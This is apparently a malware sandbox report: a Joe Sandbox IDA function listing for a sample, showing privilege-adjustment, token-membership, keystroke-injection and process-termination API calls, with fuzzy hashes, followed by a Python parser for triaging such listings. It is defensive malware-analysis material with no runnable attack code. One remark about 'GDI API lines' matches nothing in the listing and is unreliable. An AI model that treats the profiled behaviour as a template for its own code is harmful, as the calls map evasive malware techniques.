• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
• String ID:
• API String ID: 577356006-0
APIs
• CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C8D608
• DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C8D645
• CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C8D650
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: CloseControlCreateDeviceFileHandle
• String ID:
• API String ID: 33631002-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C8168C
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C816A1
• FreeSid.ADVAPI32(?), ref: 00C816B1
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
APIs
• GetCurrentProcess.KERNEL32(00C528E9,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000,?,00C528E9), ref: 00C44D09
• TerminateProcess.KERNEL32(00000000,?,00C44CBE,00C528E9,00CE88B8,0000000C,00C44E15,00C528E9,00000002,00000000,?,00C528E9), ref: 00C44D10
• ExitProcess.KERNEL32 ref: 00C44D22
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID:
• String ID: /
• API String ID: 0-2043925204
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00C96918
• FindClose.KERNEL32(00000000), ref: 00C96961
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00CA4891,?,?,00000035,?), ref: 00C937E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00CA4891,?,?,00000035,?), ref: 00C937F4
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C8B25D
• keybd_event.USER32(?,7694C0D0,?,00000000), ref: 00C8B270
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C811FC), ref: 00C810D4
• CloseHandle.KERNEL32(?,?,00C811FC), ref: 00C810E9
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
Strings
• Variable is not of type 'Object'., xrefs: 00C70C40
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.
• API String ID: 0-1840281001
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C56766,?,?,00000008,?,?,00C5FEFE,00000000), ref: 00C56998
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
                                                                      • Opcode ID: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
                                                                      • Instruction ID: ab8a93f9c6b4b27bd9a3397eb9627a2bfed7094b422caa337aefac0e79e13a71
                                                                      • Opcode Fuzzy Hash: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
                                                                      • Instruction Fuzzy Hash: 59B16C39610608DFD715CF28C486B657BE0FF05366F658658ECA9CF2A2C335DA89CB44
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0
                                                                      • API String ID: 0-4108050209
                                                                      • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction ID: e26b7a5c077455ebd52cf364c24e6211c50b405f44687ccb70857df0f4c5fc04
                                                                      • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                      • Instruction Fuzzy Hash: 35518B71A0C7455BDF388579895D7BF2789BB22300F180B09E8A2EB2C2C715DF09E356
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: af88cc12de7b34de2a8711ff12e426c5647a03f9722f5944dfe352091476fb20
                                                                      • Instruction ID: 5f352ce7b04a20ffc1280cd3052b9f68403f9bfa395a1fc0b2eae6535eba3b2f
                                                                      • Opcode Fuzzy Hash: af88cc12de7b34de2a8711ff12e426c5647a03f9722f5944dfe352091476fb20
                                                                      • Instruction Fuzzy Hash: 5B321326D29F014DD7239634D822339A249AFB73C6F15D737EC2AB59A6EF28C5C34100
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 929805c733b7b72954014c8614dbd92e2dea039d56b02cac0e034cfc0ad07d1b
                                                                      • Instruction ID: c3598c2985832d650e171b84cd28db2fa53089f8e756518892307528ae60ad3e
                                                                      • Opcode Fuzzy Hash: 929805c733b7b72954014c8614dbd92e2dea039d56b02cac0e034cfc0ad07d1b
                                                                      • Instruction Fuzzy Hash: 51321631A001578BDF28DF29D4D467D7BA1EB45310F28C56EE86EAB291D730DE82EB41
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5d56fe7928522128562650676c737f8e1d11d1058a978b0f50b521d78b484219
                                                                      • Instruction ID: 112cb640ac639a3821146153e0296109534a1a64af24e15efc8e73ca792f5c90
                                                                      • Opcode Fuzzy Hash: 5d56fe7928522128562650676c737f8e1d11d1058a978b0f50b521d78b484219
                                                                      • Instruction Fuzzy Hash: FD22D170A0061ADFDF14CF65D8C1AAEB3F1FF44300F204629E816A7691EB36AE55DB50
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 71d49e5dbb8cfdc69cbfb605a3bd305e83ec46a7f2068afee7876c08285190a7
                                                                      • Instruction ID: ed17a798c2b28bd2ad0fe451bb5d38b4203a230da30ebc1aacbe9d3a061424c1
                                                                      • Opcode Fuzzy Hash: 71d49e5dbb8cfdc69cbfb605a3bd305e83ec46a7f2068afee7876c08285190a7
                                                                      • Instruction Fuzzy Hash: 8E02C6B0E00219EFDB14DF55D881AAEBBB1FF44304F108569E8169B291EB31EE21DB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 22edf8e84cf75026e75dee9201259378458b12dc2cdf4cbf294dd66f67ba0741
                                                                      • Instruction ID: ad125024d3cfb9dde10cb0c5a086dd1fdf59f8eec2aff12f10e2998b83ae33b7
                                                                      • Opcode Fuzzy Hash: 22edf8e84cf75026e75dee9201259378458b12dc2cdf4cbf294dd66f67ba0741
                                                                      • Instruction Fuzzy Hash: 66B1E120D2AF814DD3239639D83133AB65CAFBB6D5F95D71BFC2674D62EB2286834140
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
                                                                      • Instruction ID: 8eecf0d18269045bfdc80102f2619767fed662bb5b4729de1dc25fbc3dbe7458
                                                                      • Opcode Fuzzy Hash: 03301619bf102c4c31924df29fa0706d223576eb907da8fb87dd865a831e32c8
                                                                      • Instruction Fuzzy Hash: 9061787160874997EE349A288D95BBE2398FF41700F201B1EFDA3DB281DB119F46E356
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebc6e359fac7bd68019a1189440f013adbfeaa65ac0abcce308b523f081befc
                                                                      • Instruction ID: 4f4c5225925e5167411102475d76c8c4a3908fbe518ccd74249a75ccf051b3d5
                                                                      • Opcode Fuzzy Hash: 2ebc6e359fac7bd68019a1189440f013adbfeaa65ac0abcce308b523f081befc
                                                                      • Instruction Fuzzy Hash: 3961CD31E2C7496BDE389A284D95BBF2398FF42704F100B59E953DB281DB12EF429355
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: 66ccf442dadadab89011d4811e061708bb67a13c0fa4f0d3c7426561630c73e2
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 6C41A171D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41f9c06b2eaf597d5e1dff16273f6ddcad019c6b2fa2be0825164468f6364f34
                                                                      • Instruction ID: d5db6a420af4e0c4c8aff40f692e7c443d20d291a4807759e68605b031481d1a
                                                                      • Opcode Fuzzy Hash: 41f9c06b2eaf597d5e1dff16273f6ddcad019c6b2fa2be0825164468f6364f34
                                                                      • Instruction Fuzzy Hash: B221B7326206158BDB28CF79C82377E73E5A754320F25862EE4A7C37D1DE35A904CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: b4c00e7ead70f2a4230156728c042565577b8f7799d6c174f4556e6795d59860
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: F7018078A05209EFCB44DF98D5909AEF7B5FB4C310B2085D9D819A7705D730AE42DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: cc3fef96b466f304c755adcb1b250e160b6af21506541521c6fea9486b8a4152
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: D9019278A01209EFCB48DF98D5909AEF7F5FB48310F2085D9D819AB305D731AE42DB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
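The per-function blocks above (APIs with call-site refs, the memory dump region they were disassembled from, whether that region is backed by a PE image, and the opcode / instruction fuzzy hashes) are what an analyst pivots on: functions from a region with "based on PE: false" (here the 03149000 region) are code that only exists in memory, i.e. unpacked or injected stages, and the instruction fuzzy hashes are what you match across samples. The parser below is an added example, not Joe Sandbox's own code; the record layout is inferred from the visible report lines, and the embedded sample is a constructed excerpt condensed from the blocks above (the third record pairs the GDI API lines of the last block with hash fields borrowed from an earlier record, purely as a fixture).

```python
"""Parse the per-function blocks of a Joe Sandbox function listing into
records and answer the usual triage questions: which functions live in
memory that is not backed by a PE on disk, which APIs are called, and
which records share an instruction fuzzy hash. Added example; the record
layout is inferred from the report text, not from a Joe Sandbox spec."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed excerpt, condensed from the listing above. The "Download File"
# suffix on the Associated line is how the report page renders its link.
SAMPLE = """\
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008), ref: 00C56998
Memory Dump Source
• Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
• Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
• Instruction ID: ab8a93f9c6b4b27bd9a3397eb9627a2bfed7094b422caa337aefac0e79e13a71
• Opcode Fuzzy Hash: cb1a20373b4180e0e8520ee43e80bfb63bdf88f0e05788ca8bb2137a216b5671
• Instruction Fuzzy Hash: 59B16C39610608DFD715CF28C486B657BE0FF05366F658658ECA9CF2A2C335DA89CB44
Memory Dump Source
• Source File: 00000000.00000002.2172576248.0000000003149000.00000040.00000020.00020000.00000000.sdmp, Offset: 03149000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_3149000_1162-201.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
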